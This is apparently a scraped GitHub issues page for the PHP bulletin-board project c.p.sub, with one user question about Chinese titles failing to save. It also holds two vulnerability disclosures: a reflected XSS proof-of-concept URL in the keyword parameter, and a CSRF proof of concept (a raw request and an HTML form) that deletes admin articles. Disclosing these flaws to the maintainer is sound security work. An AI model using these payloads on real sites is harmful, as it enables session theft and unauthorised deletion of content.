cooltey / c.p.sub Goto Github PK

parameter value without rigorous filtration

File：Index.php

Poc Payload：

http://site/index.php?keyword=%22%3E%3Csvg/onload=alert(domain)%3E%22

Vesrion：5.2

keyword does not check the output and input points, resulting in code triggering

Resolving: Filtering encoding or escaping

Hi,
Thanks for u create a super useful system.
Here is my question show below

Everything work fine in English...
But when I use Chinese As post title, the system will not record anything...
So I can just use English only

簡單的說
我只要在標題或是作者欄位輸入中文
所有的中文在布告欄中都會消失
但是用英文的標題就不會
目前使用的是免費空間

謝謝拉，這系統太棒了
想請您幫忙一下
不知道哪裡有問題了

Hey , C.P.Sub

In your Background admin delete Article section, did not produce relevant token verification source caused CSRF, and the "get" parameter value is very dangerous.

List：

http://website/manage.php?p=article_list

Poc Payload：

**

GET /manage.php?p=article_del&id=ID HTTP/1.1
Host: your_website
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
Referer: http://127.0.0.1/456/manage.php?p=article_list
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_5c016e8f0f95f039102cbe8366c5c7f3=test%7C1537587372%7CgZf4275f8FC9rh5rffBvPrfPZwQBwSdtTLoKtW1JdQ6%7C4350d349b75ea62d1bbd963b4ee5460a95206b92a5df2dd7899ff7ccdc51bea3; wp-settings-1=mfold%3Do; wp-settings-time-1=1537414573; cerber_groove=49d7bce85e1b8082ab6d6cdf0854abc8; cerber_groove_x_Ad7onvqFrh3GYs8jQ1I24UyDpVRC=G0c9tWNuhQ4Z8azbyspmHrx7fYE5XM; _awtvW=Zqmk3E; gXSlbZOPaVqTWrR=%5DjCLPER7IhSHZkD; tUAnShmrCET=gLvmBVQPSwn; AJeZVoHYa=Gd3nvWzpe; PHPSESSID=hbdcrh6cj6jgl9v4jo5gedbcp6
Connection: close

**

Poc Payload：

<html>
<head>
<title>CSRF</title>
</head>
<body>


  <script>history.pushState('', '', '/')</script>
    <form action="http://website/manage.php">
      <input type="hidden" name="p" value="article&#95;del" />
      <input type="hidden" name="id" value="2" />
      <input type="submit" value="Hello" />
    </form>


</body>
</html>

You can see that after obtaining the parameters of the direct splicing instructions, also echo the relevant commands, no relevant rigorous filter inspection caused the vulnerability：

Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Settings has a deprecated constructor in \CPSub\class\settings.php on line 8

Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Lib has a deprecated constructor in \WEB\CPSub\class\lib.php on line 8

Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Article has a deprecated constructor in \WEB\CPSub\class\article.php on line 8

Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Pager has a deprecated constructor in \WEB\CPSub\class\page.php on line 10

Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Template has a deprecated constructor in \WEB\CPSub\class\template.php on line 8